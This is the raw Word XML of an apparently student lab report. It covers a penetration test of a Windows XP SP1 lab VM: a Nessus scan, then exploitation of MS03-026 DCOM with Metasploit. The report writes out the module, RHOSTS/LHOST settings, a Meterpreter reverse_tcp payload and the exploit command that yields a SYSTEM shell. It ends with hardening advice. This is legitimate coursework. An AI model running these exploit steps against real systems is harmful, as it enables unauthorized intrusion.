      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 选择模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/windows/dcerpc/ms03_026_dcom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 查看模块参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/dcerpc/ms03_026_dcom) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E4102">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>搜索结果定位到 exploit/windows/dcerpc/ms03_026_dcom 模块。执行 use 命令后，控制台进入该模块的配置环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2ADE4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="163893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C03A">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 7  通过 search ms03_026 找到 MS03-026 DCOM 漏洞利用模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BB482">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="102743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4C08">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 8  使用 use 命令进入 ms03_026_dcom 模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E46F9">
      <w:pPr>
        <w:pStyle w:val="4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4.7 查看目标版本与配置参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271622E">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>使用 show targets 和 show options 查看模块支持的目标版本与必填参数。该模块的默认目标为 Windows NT SP3-6a/2000/XP/2003 Universal，与本次 Windows XP SP1 靶机相匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5428FB13">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="333438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06C7">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 9  模块默认参数与支持的目标系统版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E6024">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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12080" cy="292417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2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1F00">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 10  show targets 输出的通用 Windows XP 目标选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F538D1">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="80"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show targets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F81C47">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>设置模块参数：RHOSTS 指向 Windows XP 靶机 192.168.195.132，LHOST 设置为 Linux 测试主机 192.168.195.128，RPORT 保持默认的 135，LPORT 使用默认的 4444。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A1D55">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="80"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.195.132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>set LHOST 192.168.195.128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB0763">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="101727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4389">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 11  配置 RHOSTS 与 LHOST 地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBBCD6">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="370967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1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F702">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 12  show options 验证目标、回连地址和监听端口配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED909E4">
      <w:pPr>
        <w:pStyle w:val="4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4.8 查看并选择 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FC7BC">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在当前漏洞利用模块中使用 show payloads 查看兼容的载荷。先确认 windows/shell/reverse_tcp 配置方式，再将载荷切换为 windows/meterpreter/reverse_tcp，以便在成功后获取 Meterpreter 会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03799434">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="80"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>set payload windows/shell/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05277471">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="3415665"/>
            <wp:effectExtent l="0" t="0" r="0" b="133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1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0FEF">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 13  当前漏洞利用模块可用的 Payload 列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D09FF">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="1146810"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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677C">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 14  设置 Meterpreter 反向 TCP 载荷并执行 check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D62793">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>本次实验最终选用 windows/meterpreter/reverse_tcp 载荷。该载荷由靶机主动回连 Linux 测试主机，因此必须保证 LHOST 配置为测试主机在实验网段中的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54392B03">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.9 启动验证并观察会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7EE7BE">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>参数配置完成后执行 check 检查 TCP/135 上的 DCOM 服务状态，再执行 exploit 启动漏洞验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509880C">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="80"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EE528">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Metasploit 成功启动反向连接监听器，并建立 Meterpreter session 1。随后执行 getuid、sysinfo 和 ipconfig 进行最小化验证，确认会话来自 Windows XP SP1 靶机，且当前权限为 NT AUTHORITY\SYSTEM。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5A21E">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="162242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2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8B37">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 15  exploit 成功后建立 Meterpreter session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D3B04">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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12080" cy="4453890"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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45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0CA9">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 16  通过 getuid、sysinfo 和 ipconfig 确认目标 Windows XP 会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB89CAD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663D8C1C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396257CD">
      <w:pPr>
        <w:pStyle w:val="3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5. 实验结果与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596129A1">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>本实验使用 Nessus 对 Windows XP SP1 靶机 192.168.195.132 进行漏洞扫描。扫描任务 sp1 scan 的结果中包含 Critical 和 High 风险漏洞项，随后将 MS03-026 RPC DCOM 相关问题作为 Metasploit 验证对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727D9C5">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在模块配置阶段，RHOSTS 设置为 192.168.195.132，LHOST 设置为 192.168.195.128，RPORT 使用 135，最终 payload 设置为 windows/meterpreter/reverse_tcp。show options 的输出表明必填参数已完成配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE1B23">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>执行 exploit 后，Metasploit 输出 Meterpreter session 1 opened，表明靶机已经主动回连到测试主机。会话中 sysinfo 显示目标操作系统为 Windows XP 5.1 Build 2600 Service Pack 1，ipconfig 显示其 IPv4 地址为 192.168.195.132。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800B836">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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从安全加固角度分析，Windows XP 属于停止维护的旧系统，长期缺少安全补丁，因此暴露在网络环境中风险很高。针对这类问题，应采取系统升级、关闭不必要服务、安装补丁、限制访问来源、启用防火墙和网络隔离等防护措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45565128">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6. 心得体会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E813F0">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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通过本次实验，我理解了渗透测试并不是简单地运行攻击工具，而是一个有步骤、有边界、以安全评估为目的的过程。实验从漏洞扫描开始，先通过 Nessus 获取目标主机的漏洞情况，再根据扫描结果选择 Metasploit 中对应的模块进行验证，这体现了漏洞扫描和漏洞利用之间的衔接关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89605E">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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在配置 Metasploit 模块时，RHOSTS 和 LHOST 的含义非常关键。RHOSTS 指向被测试的目标主机，而 LHOST 是测试主机用于接收回连的地址。如果二者设置错误，即使模块和漏洞匹配，也可能无法获得会话。Payload 的选择也会影响利用效果，reverse_tcp 更适合目标主动回连测试主机，而 bind_tcp 则需要测试主机主动连接目标监听端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D267F">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:foot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56E657">
    <w:pPr>
      <w:pStyle w:val="24"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t>软件安全综合实践 · 实验六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684DA0"/>
    <w:rsid w:val="7BD8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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Consolas" w:cstheme="minorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="165">
    <w:name w:val="Figure Caption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2856</Words>
  <Characters>5110</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5594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彭轩琛</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-25T14:58:22Z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eyJoZGlkIjoiM2UyMDhjYTFmY2VhNGMzMjFiZmNhZjE1YzM4YzA2ZjIiLCJ1c2VySWQiOiIxNjg3Mjk5OTQyIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26884</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>517EFF5AFF6F45ECAA42C6A75E2B8EF1_12</vt:lpwstr>
  </property>
</Properties>
</file>